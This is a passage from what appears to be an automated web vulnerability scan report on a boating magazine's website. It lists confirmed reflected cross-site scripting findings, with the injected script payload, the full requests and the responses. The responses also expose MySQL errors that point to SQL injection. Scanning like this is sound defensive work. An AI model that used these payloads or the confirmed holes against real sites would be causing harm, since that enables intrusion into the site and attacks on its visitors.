href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li..
- /about-us

/about-us CONFIRMED

http://www.soundingsonline.com/about-us?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00243C..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00243C)</script>

Request

GET /about-us?'"--></style></script><script>netsparker(0x00243C)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243C)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243C)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/about-us" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>About Soundings Publications, LLC | Soundings Online</title> <link href="/about-us?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/about-us?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_about_us"><!--
Type of page: category<br />Section: 12, s_uncategorized<br />Category: 75, c_uncategorized<br />Menu: 54, m_about_us-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</sp..
- /columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-conditions

/columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-conditions CONFIRMED

http://www.soundingsonline.com/columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-co..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023F2)</script>

Request

GET /columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-conditions?'"--></style></script><script>netsparker(0x0023F2)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F2)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F2)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/columns-blogs/under-way/272112-heroism-shines-through-in-the-worst-conditions" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011" /> <meta name="title" content="Heroism shines through in the worst conditions" /> <meta name="author" content="William Sisson" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Heroism shines through in the worst conditions</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_columns_blogs c_under_way m_under_way"><!--
Type of page: article<br />Section: 8, s_columns_blogs<br />Category: 58, c_under_way<br />Menu: 97, m_under_way-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="..
- /contact-us

/contact-us CONFIRMED

http://www.soundingsonline.com/contact-us?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0024..

